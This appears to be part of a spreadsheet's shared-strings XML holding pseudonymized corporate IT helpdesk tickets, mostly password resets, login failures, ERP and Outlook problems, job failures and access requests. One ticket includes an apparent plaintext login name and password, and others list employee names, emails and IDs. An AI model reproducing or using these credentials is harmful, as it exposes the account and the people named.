    <t>us25- dedicated hr_tool clock in for hourly employees</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wvngzrca.sfmrzdth@gmail.com
please add the appropriate options for  the following hourly employees who have dedicated computers to clock "in" and "out" with hr_tool at their desks and laptops:
us25 -zjihgovn cqxahony 33288
us25 -dpuifqeo eglwsfkn 27125
us25 -ihlsmzdn cnhqgzwt 27230
us25-ewgihcnz vdjqoeip 62605
us25 -moxnqszg zgdckste 63856
us25 -bghrbie crhyley 27164
if i may be of further assistance please feel free to contact me at any time.
wvngzrca sfmrzdth, phr
human resources manager
us_plant/usa, nc
wvngzrca.sfmrzdth@gmail.com&lt;mailto:wvngzrca.sfmrzdth@gmail.com&gt;
</t>
  </si>
  <si>
    <t>access needed to vmsliazh ltksxmyv in us_plant.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: umzcxfah.aoshpjiu@gmail.com
user debtgyrur  had access to the us_plant vmsliazh ltksxmyv  HostName_1262  to do downloads fzwxitmen jwvuasft daily.  today that access seems to be broken.  please restore aerp.  i am usaing whatever approvals are required to restore this connection immediately.  it is causing a shutdown to the production process and needs to be immediately addressed.
</t>
  </si>
  <si>
    <t>gyweclbt oahmgpfy</t>
  </si>
  <si>
    <t>user wanted to check if there are discounts on microsoft products.</t>
  </si>
  <si>
    <t>hr_tool e time issue</t>
  </si>
  <si>
    <t>hr_tool e time issue
name:wvngzrca sfmrzdth
language:
browser:microsoft internet explorer
email:wvngzrca.sfmrzdth@gmail.com
customer number:
telephone:
summary:do i request e-time computer access from it? for team members who are assigned a computer?</t>
  </si>
  <si>
    <t xml:space="preserve">Job_1953d was running longer than 30 minutes kirtyled and rerun </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1953d at 08/08/16 16:20:26</t>
  </si>
  <si>
    <t>contract management employee publication_p2016-07-24-16-00-04</t>
  </si>
  <si>
    <t xml:space="preserve">collaboration_platform is asking me to login at each page. </t>
  </si>
  <si>
    <t>please assist with keeping my account logged in.</t>
  </si>
  <si>
    <t>HostName_1178 : the status on HostName_1178.company.com.status is not as expected (3 (red))</t>
  </si>
  <si>
    <t>xp pc in lab hooked to microscope gets a bsod on login.</t>
  </si>
  <si>
    <t>qfgtalec mwpqfbxk</t>
  </si>
  <si>
    <t xml:space="preserve"> the terminate action for johthryu chmielewski has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">from: rlgmiuwt dfpqxbgm [mailto:system@hr_tool.com] 
sent: monday, august 08, 2016 8:04 pm
to: nwfodmhc exurcwkm
subject: amar - the terminate action for johthryu chmielewski has completed.
hello , 
a termination for johthryu chmielewski, 1156177031, effective 08/05/2016  has been approved.
click the link to view.
</t>
  </si>
  <si>
    <t>rlgmiuwt dfpqxbgm</t>
  </si>
  <si>
    <t>unable to map a printer</t>
  </si>
  <si>
    <t>reset password for cnljsmat.ocxjvdnz@gmail.com</t>
  </si>
  <si>
    <t>erp-powder interface not working</t>
  </si>
  <si>
    <t xml:space="preserve">erp-powder interface not working.  </t>
  </si>
  <si>
    <t>yxwniljk doveqpsy</t>
  </si>
  <si>
    <t>change erp printer</t>
  </si>
  <si>
    <t xml:space="preserve">please change my erp printer (hrp- hcm production) to usa fm0006._x000D_
</t>
  </si>
  <si>
    <t>unable to see crm add-in in outlook</t>
  </si>
  <si>
    <t>having trouble with my password accessing the portal.</t>
  </si>
  <si>
    <t>name:upajtkbn wzyspovl
language:
browser:microsoft internet explorer
email:upajtkbn.wzyspovl@gmail.com
customer number:
telephone:
summary:having trouble with my password accessing the portal.</t>
  </si>
  <si>
    <t>unable to connect to outlook.</t>
  </si>
  <si>
    <t>microsoft outlook - all morning it shows either trying to connect or gives me an error about not being able to connect to the server. i have emails from this morning still sitting in my outbox that i cannot get to send. and no new emails coming in. i have rebooted outlook twice and my whole system once with no success.</t>
  </si>
  <si>
    <t>outlook calendar</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: opzuciql.muedfkhz@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
my outlook calendar shows "no information" when someone tries to schedule a meeting with me using the scheduling assistant. how can i fix that?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to save attachments from business_client</t>
  </si>
  <si>
    <t>uqjbkydr bsqofdlx</t>
  </si>
  <si>
    <t>unable to login to one time</t>
  </si>
  <si>
    <t xml:space="preserve">
name:wvngzrca sfmrzdth
language:
browser:microsoft internet explorer
email:wvngzrca.sfmrzdth@gmail.com
customer number:
telephone:
summary:i have had and still have issues with sf loading. it is just a white page. can you advise?
</t>
  </si>
  <si>
    <t>vmax disk failed on df-8b-c</t>
  </si>
  <si>
    <t>the monitor is the disk failed? on df-8b-c-0/000192604484/localhost is outside expected limits (true = true)</t>
  </si>
  <si>
    <t>rounding concerns for mexico.  please assign ticket to rabhtuikurtyar  tammineni</t>
  </si>
  <si>
    <t>znet should not be applied to zcnc, zcnp or manual condition for 1108.</t>
  </si>
  <si>
    <t xml:space="preserve">account locked out : trust relationship issue </t>
  </si>
  <si>
    <t>engineering tool system</t>
  </si>
  <si>
    <t>not able to enter customer details in engineering_tool system</t>
  </si>
  <si>
    <t>unable to hear any audio from skype</t>
  </si>
  <si>
    <t xml:space="preserve">mii is not responding:orders can not be scanned out, system is locking up, or giving error (see below) </t>
  </si>
  <si>
    <t xml:space="preserve">there was a technical error. &lt;br&gt; please try again. &lt;br&gt; if the problem persists please notify an administrator &lt;br&gt; error:the following error occured while processing the request :[object object] status: error error: internal server error_x000D_
_x000D_
operator have rebooted computer multiple times.  karghyuen </t>
  </si>
  <si>
    <t>swapdqkx cvkbwjxe</t>
  </si>
  <si>
    <t>password reset and login issues in collaboration_platform.</t>
  </si>
  <si>
    <t>gsyjxfur nuwoikzj</t>
  </si>
  <si>
    <t>employee's password for etime is not working</t>
  </si>
  <si>
    <t>please issue new password for etime access for employee gyweclbt oahmgpfy, ee#636130 aerp.</t>
  </si>
  <si>
    <t>urgianpb rwbpsvmh</t>
  </si>
  <si>
    <t>release of device</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qpixeudn.rjlziysd@gmail.com_x000D_
_x000D_
please release this device from quarantine_x000D_
_x000D_
from: microsoft outlook_x000D_
sent: monday, august 8, 2016 11:20 am_x000D_
to: qpixeudn rjlziysd &lt;qpixeudn.rjlziysd@gmail.com&gt;_x000D_
subject: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000D_
_x000D_
_x000D_
your mobile device is temporarily blocked from accessing content via exchange activesync because the mobile device has been quarantined. you don't need to take any action. content will automatically be downloaded as soon as access is usaed by your administrator._x000D_
_x000D_
please ignore the above paragraph. we cannot change it or delete it._x000D_
_x000D_
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platform._x000D_
_x000D_
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devices._x000D_
_x000D_
currently approved handheld devices can be found in this policy:_x000D_
_x000D_
wireless mobility technical document &lt;_x000D_
_x000D_
the above policy will be updated as other devices are approved for use._x000D_
_x000D_
if you own an approved device and would like to take advantage of this opportstorage_product you can submit a ticketing_tool ticket &lt;"https:/company.ticketing_tool.com/incident.do?sysparm_stack=incident_list.do&amp;sys_id=-1&amp;sysparm_query=incident.do?sys_id=-1&amp;sysparm_template=mobile&gt;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it._x000D_
_x000D_
any ticket without the signed form will be cancelled. you have 2 weeks to process and submit the form before your device will be denied (deleted from quarantine)._x000D_
_x000D_
wireless mobility standard procedure &lt;_x000D_
_x000D_
information about your mobile device:_x000D_
device model:_x000D_
_x000D_
iphone8c1_x000D_
_x000D_
device type:_x000D_
_x000D_
iphone_x000D_
_x000D_
device id:_x000D_
_x000D_
r6ufpmv1sd4uSID_7839t39l7gfkk_x000D_
_x000D_
device os:_x000D_
_x000D_
ios 9.3.3 13g34_x000D_
_x000D_
device user agent:_x000D_
_x000D_
apple-iphone8c1/1307.34_x000D_
_x000D_
device imei:_x000D_
_x000D_
exchange activesync version:_x000D_
_x000D_
16.0_x000D_
_x000D_
device access state:_x000D_
_x000D_
quarantined_x000D_
_x000D_
device access state reason:_x000D_
_x000D_
global_x000D_
_x000D_
_x000D_
sent at 8/8/2016 3:20:18 pm to qpixeudn.rjlziysd@gmail.com&lt;mailto:qpixeudn.rjlziysd@gmail.com&gt;._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to login to outlook and skype</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000D_
_x000D_
enter user id of user having the issue: mitctdrhb_x000D_
_x000D_
transaction code(s) the user needs or was working with:logon_x000D_
_x000D_
describe the issue: changed password using password manager, unable to log into erp_x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>msrxjfdz ncsaryod</t>
  </si>
  <si>
    <t>ess password reset request</t>
  </si>
  <si>
    <t>misplaced password, ad password reset needed</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the user ricagthyr doflefne id:noggtyuerp</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,_x000D_
_x000D_
could you please unlock account  email  in cell phone the user ptgwfymc.mchpwvgf@gmail.com id:noggtyuerp_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>skype im not logging in</t>
  </si>
  <si>
    <t>stuck at logging in._x000D_
personal certificate error</t>
  </si>
  <si>
    <t>issue while connecting though telecom_vendor_3 gprs sim</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cgqjxtkf.soewtuvf@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am facing an issue while connecting telecom_vendor_3 gprs network._x000D_
pl look into the same._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cgqjxtkf soewtuvf</t>
  </si>
  <si>
    <t>reset the password for  on erp / production / hcm</t>
  </si>
  <si>
    <t xml:space="preserve">locked out of erp SID_34 not set up in password_management_tool getting an error unable to find account for user ginemkl when logging into password_management_tool. _x000D_
_x000D_
please notify wptbgchj jutpdcqf once account is unlocked_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>reset passwords for kevguind l gineman using password_management_tool password reset.</t>
  </si>
  <si>
    <t>nckihpba czrdksex</t>
  </si>
  <si>
    <t>goods receipt issue</t>
  </si>
  <si>
    <t xml:space="preserve">hello, on po5616641196 the po was created for 10 rolls of paper with a price of Â£19.36 each. this price has not been changed in the purchase order but the goods receipt has been booked in for a total amount of Â£367.84. i have asked about this with the uk warehouse and they are not sure it's possible to goods receipt at a different value. can you see what has caused this? </t>
  </si>
  <si>
    <t>fonjtyhr wnclfztv</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2021b</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2021b at 08/08/16 10:10:27</t>
  </si>
  <si>
    <t>job qeue from the engg application stopped</t>
  </si>
  <si>
    <t>the job qeue processor of the engg stopped and needs to be restarted. please forward to the engg group.</t>
  </si>
  <si>
    <t>windows account locked out</t>
  </si>
  <si>
    <t>my docking station is not charging my computer</t>
  </si>
  <si>
    <t xml:space="preserve"> i've checked all the plugs and it's still not charging my computer.</t>
  </si>
  <si>
    <t>issues with lean tracker</t>
  </si>
  <si>
    <t>unable to launch outlook after changing the password</t>
  </si>
  <si>
    <t xml:space="preserve">unlock csvlijud jzhnkclo </t>
  </si>
  <si>
    <t xml:space="preserve">unlock csvlijud jzhnkclo 
pc name : rrsp04479
contact name : 
user id ; 
.\administrator  
</t>
  </si>
  <si>
    <t>unable to login to windows // account locked</t>
  </si>
  <si>
    <t>unable to log into hr_tool</t>
  </si>
  <si>
    <t xml:space="preserve">i get directed to a hr_tool logon page instead of directly getting authenticated with sso._x000D_
see attachments _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i cannot make a skype meeting, every time it errors out stating that skype is not running.</t>
  </si>
  <si>
    <t>shagfferon called to reset password for user :bregtnnl</t>
  </si>
  <si>
    <t>xpvluoni xeqjzofu</t>
  </si>
  <si>
    <t>reset the password for robhyertyj l shipping_tool on erp / production / bw</t>
  </si>
  <si>
    <t>i have not used this in quite awhile and it will not let me in with my current password.</t>
  </si>
  <si>
    <t>sdvlxbfe ptnahjkw</t>
  </si>
  <si>
    <t xml:space="preserve">browser issue : collaboration_platform not loading </t>
  </si>
  <si>
    <t>zxvjsipd jbzmgyvd</t>
  </si>
  <si>
    <t>circuit outage: vogelfontein, south africa mpls circuit is down at 8:14 am et on 08/08</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________8:14 am et on 08/08____________x000D_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_____yes_    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ____yes____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</si>
  <si>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access to vpn : user id : wijuiidl</t>
  </si>
  <si>
    <t xml:space="preserve">computer name ; lehl8516849_x000D_
access to vpn </t>
  </si>
  <si>
    <t>imcknxos ucyfkaxg</t>
  </si>
  <si>
    <t xml:space="preserve">bex patch installation </t>
  </si>
  <si>
    <t>nqlertog bshidqox</t>
  </si>
  <si>
    <t xml:space="preserve">supply_chain_software login issue </t>
  </si>
  <si>
    <t>ingreso a business_client</t>
  </si>
  <si>
    <t>no puedo ingresar a business_client con mi contraseÃ±a.</t>
  </si>
  <si>
    <t>igfbkzne duyinzmx</t>
  </si>
  <si>
    <t>need replacement monitor for coatncqulao qauighdpchine.</t>
  </si>
  <si>
    <t>utvpkdgi oznqyvmp</t>
  </si>
  <si>
    <t>item numbers issue with the inwarehouse_tool forms for israel</t>
  </si>
  <si>
    <t>item numbers issue with the inwarehouse_tool forms for israel.</t>
  </si>
  <si>
    <t xml:space="preserve">bqdlegnp lnphmsco's password has expired.  please call him at </t>
  </si>
  <si>
    <t>please call bqdlegnp lnphmsco at to update his password.  he cannot login to anything.</t>
  </si>
  <si>
    <t>bqdlegnp lnphmsco</t>
  </si>
  <si>
    <t>general enquiry</t>
  </si>
  <si>
    <t>time recording is not working</t>
  </si>
  <si>
    <t xml:space="preserve">
EU_tool - unable to connect to server. time recording in EU_tool does not work. EU_tool is installed on the user's pc.
telefon:</t>
  </si>
  <si>
    <t>my home location is usa.  whenever i come to us_plant, and connect to the network, my pc runs estorage_productly slow.  all programdntys are slow._x000D_
_x000D_
how did you determine there are network problems ?_x000D_
_x000D_
is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow)_x000D_
_x000D_
are more than one transactions impacted?_x000D_
_x000D_
what erp server are you on (server name is located in the status bar at the bottom _x000D_
right of your screen) ?_x000D_
_x000D_
do other co-workers also notice slow response times in erp ?_x000D_
_x000D_
what other applications are running slow ? _x000D_
_x000D_
can you access your data files on the server ?_x000D_
_x000D_
any other comments or issues with other systems ?</t>
  </si>
  <si>
    <t>oneteam sso not working</t>
  </si>
  <si>
    <t xml:space="preserve">i'm unable to log in to hr_tool/oneteam through the sso portal on the hub. whenever i click on the oneteam link in the portal i'm taken to a login screen instead of being logged directly into the system. i have tried clearing my browser cache and i've tried logging in using both ie and firefox. </t>
  </si>
  <si>
    <t>GRP_73</t>
  </si>
  <si>
    <t>company center does not show org 1101 after i changed my password</t>
  </si>
  <si>
    <t>i just changed my password and now my company center account does not show the option to choose 1101 in the sales org.  login info:  bfrgtonersp  au45gdec22</t>
  </si>
  <si>
    <t>jizkuxpg hfamjysw</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_184- average (1 samples) disk free on /nfsbackup is now 2%, which is below the error threshold (5%)  </t>
  </si>
  <si>
    <t>HostName_184- disk free on /nfsbackup is now 2%, which is below the error threshold (5%) out of total size 7000.0 gb</t>
  </si>
  <si>
    <t>install pdf-mailer \kebogxzp difnjlkp</t>
  </si>
  <si>
    <t>kebogxzp difnjlkp</t>
  </si>
  <si>
    <t>reset the password for couskjgd uzojtkmh on windows login</t>
  </si>
  <si>
    <t xml:space="preserve">hi,
please unlock sebfghkasthian's account. (couskjgd uzojtkmh - wirftejas - couskjgd.uzojtkmh@gmail.com)
</t>
  </si>
  <si>
    <t>reset passwords for couskjgd uzojtkmh using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">hi, _x000D_
please unlock sebfghkasthian's (wiejas couskjgd.uzojtkmh@gmail.com) account._x000D_
</t>
  </si>
  <si>
    <t>probleme mit rechner ewew8323531 \defekte fp sektoren \xosdfhbu gtbfkisl</t>
  </si>
  <si>
    <t>requester: oqxdecus encxjoawjr:  can you put usa-shop sw06 port23 on the vlan50? i'm trying to get a machine on the netwo</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sthyuraj.sektyhar@company.com_x000D_
_x000D_
hi suraj. can you put usa-shop sw06 port23 on the vlan50? i'm trying to get a machine on the network._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to open collaboration_platform</t>
  </si>
  <si>
    <t>name:betshdy 
language:
browser:microsoft internet explorer
email:zxvjsipd.jbzmgyvd@gmail.com
customer number:
telephone:
summary:i cannot get collaboration_platform to open. it just sits and spins.</t>
  </si>
  <si>
    <t>vip 2 - incorrect language in automated email message</t>
  </si>
  <si>
    <t>i received 2 emails (attached) for taking over a collaboration_platform for an employee who is no longer working at company._x000D_
1 message was in german, the other is portuguese (i think).</t>
  </si>
  <si>
    <t>email delegation issues with nqtjsbad.jfxeoudc@gmail.com mailbox</t>
  </si>
  <si>
    <t>urgent  : need access to all roanoke drives for new machine user for mii implementation today</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: umzcxfah.aoshpjiu@gmail.com
all machines in roanoke have been changed to user login "roaghyunokepc" full access.
please add this user to all lrrsm03\departments  aerp.  production is down.
umzcxfah aoshpjiu
plant controller, us_plant
umzcxfah.aoshpjiu@gmail.com
</t>
  </si>
  <si>
    <t>erp output screen issue.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: esaqztby.mhnbqiyc@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
kindly look into below snap, erp output screen enable to show details in proper arrangement , is there any issue in erp network._x000D_
_x000D_
[cid:image001.jpg@01d1f19b.92b3d920]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>rds server germany not reachable for thinclients (HostName_584)</t>
  </si>
  <si>
    <t>after reboot of the serverteam my thinclients are not able to connect to the rds server (HostName_584)</t>
  </si>
  <si>
    <t xml:space="preserve">single/sign on for hr_tool oneteam is not working </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jegpvyrh.kasnhdrb@gmail.com_x000D_
_x000D_
single/sign on for hr_tool oneteam is not working_x000D_
please see screen below._x000D_
_x000D_
[cid:image001.png@01d1f181.a1f8SID_310]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jegpvyrh kasnhdrb</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 zdsxmcwu thdjzolwronization issue  </t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 zdsxmcwu thdjzolwronization issue </t>
  </si>
  <si>
    <t>cubslqyt dwzhnmgy</t>
  </si>
  <si>
    <t xml:space="preserve">ethics access </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jegpvyrh.kasnhdrb@gmail.com_x000D_
_x000D_
team,_x000D_
i would like to complete ethics._x000D_
i ask you to usa access._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problem with EU_tool</t>
  </si>
  <si>
    <t xml:space="preserve">hello altogether_x000D_
_x000D_
we have problems with our EU_tool._x000D_
please open zuteillisten&gt;&gt;&gt;plant_110 &gt;&gt;&gt;&gt;hartbearbeitung&gt;&gt;&gt;&gt;&gt;kantenverrunden&gt;&gt;&gt;&gt;sammelarbpl_x000D_
_x000D_
then you see this window:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
in the past when we do a doubleklick on eps we could see in a new window our point of measurement for this inserts. but now this function is out of service. _x000D_
 _x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>kcqzrgef awnjdlyr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mstnjfai.xcobykhl@gmail.com_x000D_
_x000D_
hello altogether_x000D_
_x000D_
we have problems with our EU_tool._x000D_
please open zuteillisten&gt;&gt;&gt;plant_110 &gt;&gt;&gt;&gt;hartbearbeitung&gt;&gt;&gt;&gt;&gt;kantenverrunden&gt;&gt;&gt;&gt;sammelarbpl_x000D_
_x000D_
then you see this window:_x000D_
[cid:image005.png@01d1f173.087ba8f0]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
in the past when we do a doubleklick on eps we could see in a new window our point of measurement for this inserts. but now this function is out of service._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>guest wifi access request</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wchidyuk.shqbfpuy@gmail.com
hi,
following are the details of guest visiting company india from tomorrow and request you to provigjtyswkb dpvaymxrest wifi access.
sl.no.
guest first name
guest last name
guest email-id
location
company sponsor email-id
access required till (date)
1
sadiertpta
palffs
sadiertpta.palffs@partner.com&lt;mailto:sadiertpta.palffs@partner.com&gt;
india
yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;
08/12/2016
2
rohitdrf
stahyru
rohitdrf.stahyru8@partner.com&lt;mailto:rohitdrf.stahyru8@partner.com&gt;
india
yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;
09/09/2016
3
vikrhtyas kurtyar 
gurpthy
vikrhtyaskurtyar .gurpthy@partner.com&lt;mailto:vikrhtyaskurtyar .gurpthy@partner.com&gt;
india
yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;
09/09/2016
with </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
my access to SID_1 seems to be not working._x000D_
_x000D_
please enable &amp; confirm. </t>
  </si>
  <si>
    <t>open order kart issues - distributor_tool</t>
  </si>
  <si>
    <t>in the distributor_tool production system, the oprn carts are not displaying any carrier information._x000D_
_x000D_
please check and fix the issue urgently.</t>
  </si>
  <si>
    <t>mii at usa is estorage_productly slow and errors out</t>
  </si>
  <si>
    <t>hello, _x000D_
would you please support?_x000D_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t>
  </si>
  <si>
    <t xml:space="preserve">no boot : 7350  </t>
  </si>
  <si>
    <t xml:space="preserve">no boot : 7350 </t>
  </si>
  <si>
    <t xml:space="preserve">ticketing_tool queries </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:ticketing_tool change i have changed the status to closed cancelled instead of closed complete. how to revert the change?</t>
  </si>
  <si>
    <t>abtknpew ifcekjdb</t>
  </si>
  <si>
    <t>in the dob report - there is no option to subscribe to the reprot to receive it daily in your mail</t>
  </si>
  <si>
    <t xml:space="preserve">the dob report_x000D_
#/site/certified_content/views/dailyorderbillingreport/day?:iid=1_x000D_
needs to have a subscribe option _x000D_
i cannot see it on the screen_x000D_
</t>
  </si>
  <si>
    <t>attendance_tool password rest</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kugwsrjz.xnygwtle@gmail.com
please reset my attendance_tool password as i forgot.
username: 20341722
gurhyqsath j
india met
kugwsrjz.xnygwtle@gmail.com&lt;mailto:kugwsrjz.xnygwtle@gmail.com&gt;
</t>
  </si>
  <si>
    <t>reporting_tool application sending multiple emails via smtp : hqap100.company.com</t>
  </si>
  <si>
    <t xml:space="preserve">hi ramdnty,_x000D_
as discussed, we send emails (also called subscriptions) out of reporting_tool application on a daily basis._x000D_
the smtp server has remained the same for last 2 years. _x000D_
since 29th july, the users are receiving duplicate emails. for example, see attached the duplicate emails i have been receiving daily._x000D_
one more thing to note is that reporting_tool maintains a count of emails sent per day but the count has not doubled indicating that smtp server seems to be processing it twice instead of reporting_tool sending them multiple times._x000D_
smtp server : hqap100.company.com_x000D_
the issue has been escalate to higher management. _x000D_
greatly appreciate if you could look into this as the earliest. let me know if you need more details._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
below mentioned employee is unable to login ess portal. please reset the password.
emp no
name
useid
202845583
yaxmwdth xsfgitmq
vvdortddp
fyi.
[cid:image001.png@01d1f185.546032b0]
with </t>
  </si>
  <si>
    <t xml:space="preserve">audio not working </t>
  </si>
  <si>
    <t xml:space="preserve">audio not working _x000D_
computer model-dell precision m4800_x000D_
 name-awyl8912226_x000D_
</t>
  </si>
  <si>
    <t>rcvyfkzo hstgdfyx</t>
  </si>
  <si>
    <t xml:space="preserve">vendor drawing access is not working - no vendor can access data anymore </t>
  </si>
  <si>
    <t>vendor_access isn't working (external website) no vendor can access drawings or model. situation get critical and causes delays in customer orders. all vendors are affected._x000D_
error message : unable to read document information from erp (see attachment)</t>
  </si>
  <si>
    <t>investment antrag mnakehrf mvunqihf - new laptop request - mnakehrf mvunqihf</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jywvemun.qngschtz@gmail.com_x000D_
_x000D_
team, anbei ein investmentantrag fÃ¼r einen neuen rechner/laptop fÃ¼r mnakehrf mvunqihf_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3181</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3181 at 08/08/16 05:01:29</t>
  </si>
  <si>
    <t xml:space="preserve">stepfhryhan needs access to below collaboration_platform links. </t>
  </si>
  <si>
    <t xml:space="preserve">stepfhryhan needs access to below collaboration_platform links. 
urlaubsplanung (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/urlaubsplanung) 
3p plÃ¤ne (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/3p%20pl%e4ne) 
allgemeines (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/allgemeines) 
berirtchtswesen gebiet nord (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/berirtchtswesen%20gebiet%20nord) 
crm teamordner (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/crm%20teamordner) 
teamcall teammeeting (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/teamcall%20teammeeting) 
top 5 projekte (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/top%205%20projekte) 
hallo sabrthy,
wie weit sind wir in diesem thema? habe noch kein ticket erhaltenâ€¦
mit freundlichen grÃ¼ÃŸen
nizholae bjnqikym
anwendungstechniker i application engineer
nizholae.bjnqikym@gmail.com
company deutschland gmbh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von: nizholae bjnqikym 
gesendet: donnerstag, 21. juli 2016 12:16
an: aorthyme rnsuipbk &lt;aorthyme.rnsuipbk@gmail.com&gt;
betreff: aw: no access to netweaver.
danke sabrthyâ€¦
mit freundlichen grÃ¼ÃŸen
nizholae bjnqikym
anwendungstechniker i application engineer
nizholae.bjnqikym@gmail.com
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select the following link to view the disclaimer in an alternate language. 
von: aorthyme rnsuipbk 
gesendet: donnerstag, 21. juli 2016 12:03
an: nizholae bjnqikym &lt;nizholae.bjnqikym@gmail.com&gt;
betreff: re: no access to netweaver.
hallo stepfhryhan,
das nimmt ein bisschen zeit. ich erfasse ein ticket dazu.
warm </t>
  </si>
  <si>
    <t>nizholae bjnqikym</t>
  </si>
  <si>
    <t>unable to select my course, when i select a language there is an error and unable to go further</t>
  </si>
  <si>
    <t>data backup und restore \ahlqgjwx wbsfavhg</t>
  </si>
  <si>
    <t>setup new ws \aqstdryv flbnyqzc</t>
  </si>
  <si>
    <t>aqstdryv flbnyqzc</t>
  </si>
  <si>
    <t>cannot log-in to telephony_software</t>
  </si>
  <si>
    <t xml:space="preserve">hello, _x000D_
_x000D_
cannot log in to telephony_software, see error message attached.  in the meantime i tried so many times that my password is surely locked, too. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>order: 24761483</t>
  </si>
  <si>
    <t xml:space="preserve">from: rxoynvgi ntgdsehl 
sent: monday, august 08, 2016 12:16 pm
to: nwfodmhc exurcwkm
cc: johthryugftyson hu; kaguhxwo uoyipxqg; -kds sw11-services
subject: rad:fw: order: 35872594
hi it team
kindly please assist, as we unable to create dn for po 5018078764.
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd 
( asia regional distribution centre)
email : rxoynvgi.ntgdsehl@gmail.com
from: johthryugftyson hu 
sent: monday, august 08, 2016 1:14 pm
to: -kds mmaster; rxoynvgi ntgdsehl
